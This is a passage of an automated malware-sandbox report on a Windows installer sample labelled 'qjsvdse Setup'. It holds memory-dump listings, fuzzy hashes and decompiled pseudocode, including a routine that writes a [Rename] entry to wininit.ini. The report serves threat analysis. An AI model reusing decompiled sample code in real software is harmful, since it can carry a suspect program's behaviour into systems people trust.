                                                                                              0x004068e1
                                                                                              0x004068e2
                                                                                              0x004068e2
                                                                                              0x00000000
                                                                                              0x004068da
                                                                                              0x0040684e
                                                                                              0x00406854
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                                                              • Instruction ID: 233014ff28be9fca5e40c1aeee1244862099a57bf12043c09a7623bfee50ec27
                                                                                              • Opcode Fuzzy Hash: 9c33ce0fc1a3953d6a0fdc535813205e5f0e8e75a81554b33e1599d899765756
                                                                                              • Instruction Fuzzy Hash: D0C13B71A00259CBCF14DF68C4905EEB7B2FF99314F26826AD856B7380D734A952CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2A0F, Relevance: .3, Instructions: 299COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f9bbd0a44c47a5a3cd0ca59b0bddf681a314de0fb93e3608311ae93f4afc109e
                                                                                              • Instruction ID: ec52c70ec70cf7de983f3b8ef0be1d25b09e60c69cc93f725a165124ffa268d4
                                                                                              • Opcode Fuzzy Hash: f9bbd0a44c47a5a3cd0ca59b0bddf681a314de0fb93e3608311ae93f4afc109e
                                                                                              • Instruction Fuzzy Hash: 32E1F11489D2EDADCF46CBF981517FCBFB45D2A112F0841C6E4E5E6283C53A938E9B21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2A1E, Relevance: .3, Instructions: 291COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6307a91a3229f68832192bd70f940499c73742ac6b09f351b0a4c0cb785aeea
                                                                                              • Instruction ID: 6bf7e691b6d1523c6148343eb023fe75570c3a223b0f70dcf73d48d010ba6830
                                                                                              • Opcode Fuzzy Hash: e6307a91a3229f68832192bd70f940499c73742ac6b09f351b0a4c0cb785aeea
                                                                                              • Instruction Fuzzy Hash: 10D1D01499D2EDADCF46CBF941617FCBFB45D2A102F0841C6E4E5E6283C53A938E9B21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2616, Relevance: .1, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                                              • Instruction ID: 9547a81be347ea4194a9b54e8d4156db7e1851b14db042296850281096fd3c73
                                                                                              • Opcode Fuzzy Hash: 33a51492acd799fda5257bf088777f214ccb1d9f9f441b58e2bbc693c92cdb2e
                                                                                              • Instruction Fuzzy Hash: F5110671A02188AFDB10DFA9C4888AAF7FDEF556E0B5040A6EC05D3214E770EE52C660
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2706, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                                              • Instruction ID: fff99f838abb2fb5aa93f3eee7000d397fc69ed2f9ce17e7aaf5430b5baa7105
                                                                                              • Opcode Fuzzy Hash: bc1e897972a7d9dc8875f39a415db8f1ab4cad54cee1718619e07451133396d9
                                                                                              • Instruction Fuzzy Hash: 09E0E5357656899F8B48CBA8C982D55B3E8EB2A260B114395E825C73A0EA34FE119A50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2744, Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                              • Instruction ID: 9d14632128123330d58dfb10125bd600f6d1f3d1a5f2d9821bd037d792392ee1
                                                                                              • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                                                                              • Instruction Fuzzy Hash: 62E086363126D08BC320DB19C580842F3E9FFA96F0715456AEC59D7710C330FC128650
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F26C7, Relevance: .0, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                                                                              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                                                                              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403E25, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 204windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00403E25(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x429fb8 =  *0x429fb8 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403D44(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42db00;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42eb68, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42eb68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x429fb8 != 0) {
						goto L25;
					} else {
						_t112 =  *0x4297a8 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403CFF(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004040B0();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e33c; // 0x65aa00
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42eb98; // 0x6590c0
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403DF1;
				E00403CDD(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403CDD(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403CFF( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403D12(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42eb70; // 0x654160
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x428f9c =  *0x428f9c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x429fb8 =  *0x429fb8 & 0x00000000;
				return 0;
			}




















                                                                                              0x00403e35
                                                                                              0x00403f5b
                                                                                              0x00403fb7
                                                                                              0x00403fbb
                                                                                              0x00404092
                                                                                              0x00404094
                                                                                              0x00404094
                                                                                              0x0040409a
                                                                                              0x0040409a
                                                                                              0x0040409d
                                                                                              0x00000000
                                                                                              0x004040a4
                                                                                              0x00403fc9
                                                                                              0x00403fcb
                                                                                              0x00403fd5
                                                                                              0x00403fe0
                                                                                              0x00403fe3
                                                                                              0x00403fe6
                                                                                              0x00403ff1
                                                                                              0x00403ff4
                                                                                              0x00403ffb
                                                                                              0x00404009
                                                                                              0x00404021
                                                                                              0x00404034
                                                                                              0x00404044
                                                                                              0x00404046
                                                                                              0x00404046
                                                                                              0x00403ffb
                                                                                              0x00404050
                                                                                              0x00000000
                                                                                              0x0040405b
                                                                                              0x0040405f
                                                                                              0x00404070
                                                                                              0x00404070
                                                                                              0x00404076
                                                                                              0x00404084
                                                                                              0x00404084
                                                                                              0x00000000
                                                                                              0x00404088
                                                                                              0x00404050
                                                                                              0x00403f66
                                                                                              0x00000000
                                                                                              0x00403f7a
                                                                                              0x00403f80
                                                                                              0x00403f86
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403fab
                                                                                              0x00403fad
                                                                                              0x00403fb2
                                                                                              0x00000000
                                                                                              0x00403fb2
                                                                                              0x00403f66
                                                                                              0x00403e3b
                                                                                              0x00403e3e
                                                                                              0x00403e43
                                                                                              0x00403e45
                                                                                              0x00403e54
                                                                                              0x00403e54
                                                                                              0x00403e56
                                                                                              0x00403e5b
                                                                                              0x00403e5e
                                                                                              0x00403e60
                                                                                              0x00403e65
                                                                                              0x00403e6e
                                                                                              0x00403e74
                                                                                              0x00403e80
                                                                                              0x00403e83
                                                                                              0x00403e8c
                                                                                              0x00403e91
                                                                                              0x00403e94
                                                                                              0x00403e99
                                                                                              0x00403eb0
                                                                                              0x00403eb7
                                                                                              0x00403eca
                                                                                              0x00403ecd
                                                                                              0x00403ee2
                                                                                              0x00403ee4
                                                                                              0x00403ee9
                                                                                              0x00403eee
                                                                                              0x00403ef3
                                                                                              0x00403ef3
                                                                                              0x00403f02
                                                                                              0x00403f11
                                                                                              0x00403f13
                                                                                              0x00403f29
                                                                                              0x00403f38
                                                                                              0x00403f3a
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: N$`Ae$ivvzb$open
                                                                                              • API String ID: 3615053054-4071213321
                                                                                              • Opcode ID: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                              • Instruction ID: ff75cf5183ce2723ba3e9af3fd3b1123c83c1709a93184edc862a5803e63a157
                                                                                              • Opcode Fuzzy Hash: 3195d29b63b907abe7959c186dfd862ee6b367c2438cb1dc7bf172a45b8d0b96
                                                                                              • Instruction Fuzzy Hash: 3861CEB1A40209BFEB109F60CD45F6A7B69EB44715F10843AFB05BA2D1C7B8AD51CF98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401000, Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 125COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 90%
                                                                                              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42eb70; // 0x654160
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "qjsvdse Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42eb68; // 0x80110
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                              0x0040100a
                                                                                              0x00401039
                                                                                              0x00401047
                                                                                              0x0040104d
                                                                                              0x00401051
                                                                                              0x0040105b
                                                                                              0x00401061
                                                                                              0x00401064
                                                                                              0x004010f3
                                                                                              0x00401089
                                                                                              0x0040108c
                                                                                              0x004010a6
                                                                                              0x004010bd
                                                                                              0x004010cc
                                                                                              0x004010cf
                                                                                              0x004010d5
                                                                                              0x004010d9
                                                                                              0x004010e4
                                                                                              0x004010ed
                                                                                              0x004010ef
                                                                                              0x004010ef
                                                                                              0x00401100
                                                                                              0x00401105
                                                                                              0x0040110d
                                                                                              0x00401110
                                                                                              0x00401112
                                                                                              0x00401118
                                                                                              0x0040111f
                                                                                              0x00401126
                                                                                              0x00401130
                                                                                              0x00401142
                                                                                              0x00401156
                                                                                              0x00401160
                                                                                              0x00401165
                                                                                              0x00401165
                                                                                              0x00401110
                                                                                              0x0040116e
                                                                                              0x00000000
                                                                                              0x00401178
                                                                                              0x00401010
                                                                                              0x00401013
                                                                                              0x00401015
                                                                                              0x00401019
                                                                                              0x0040101f
                                                                                              0x0040101f
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32 ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32 ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextA.USER32(00000000,qjsvdse Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F$`Ae$qjsvdse Setup
                                                                                              • API String ID: 941294808-3970708335
                                                                                              • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                              • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
                                                                                              • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
                                                                                              • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405679, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 93%
                                                                                              			E00405679() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405C49(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ebf0 =  *0x42ebf0 + 1;
						return _t20;
					}
				}
				 *0x42c168 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bbe0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b7e0, "%s=%s\r\n", 0x42c168, 0x42bbe0);
						_t18 =  *0x42eb70; // 0x654160
						_t56 = _t55 + 0x10;
						E0040594D(_t43, 0x400, 0x42bbe0, 0x42bbe0,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E00405602(0x42bbe0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405577(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405577(_t26 + 0xa, 0x409328);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004055C3(_t51 + _t29, 0x42b7e0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E0040592B(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405602(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c168, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                                                              0x0040567f
                                                                                              0x00405686
                                                                                              0x0040568a
                                                                                              0x00405693
                                                                                              0x00405697
                                                                                              0x004057d6
                                                                                              0x004057d6
                                                                                              0x00000000
                                                                                              0x004057d6
                                                                                              0x00405697
                                                                                              0x004056a3
                                                                                              0x004056b9
                                                                                              0x004056e1
                                                                                              0x004056ec
                                                                                              0x004056f0
                                                                                              0x00405710
                                                                                              0x00405712
                                                                                              0x00405717
                                                                                              0x00405721
                                                                                              0x0040572e
                                                                                              0x00405733
                                                                                              0x00405738
                                                                                              0x0040573c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040574b
                                                                                              0x0040574d
                                                                                              0x0040575a
                                                                                              0x0040575e
                                                                                              0x004057cf
                                                                                              0x004057d0
                                                                                              0x00000000
                                                                                              0x0040577a
                                                                                              0x00405787
                                                                                              0x004057ec
                                                                                              0x004057f3
                                                                                              0x0040579a
                                                                                              0x0040579a
                                                                                              0x0040579c
                                                                                              0x004057a5
                                                                                              0x004057b0
                                                                                              0x004057c2
                                                                                              0x004057c9
                                                                                              0x00000000
                                                                                              0x004057c9
                                                                                              0x004057f5
                                                                                              0x004057f6
                                                                                              0x004057fb
                                                                                              0x004057fd
                                                                                              0x0040580a
                                                                                              0x0040580a
                                                                                              0x0040580e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004057ff
                                                                                              0x004057ff
                                                                                              0x00405802
                                                                                              0x00405805
                                                                                              0x00405806
                                                                                              0x00000000
                                                                                              0x004057ff
                                                                                              0x00405792
                                                                                              0x00405797
                                                                                              0x00000000
                                                                                              0x00405797
                                                                                              0x0040575e
                                                                                              0x004056bb
                                                                                              0x004056c6
                                                                                              0x004056cf
                                                                                              0x004056d3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004056d3
                                                                                              0x004057e0

                                                                                              APIs
                                                                                                • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,0040540E,?,00000000,000000F1,?), ref: 004056C6
                                                                                              • GetShortPathNameA.KERNEL32 ref: 004056CF
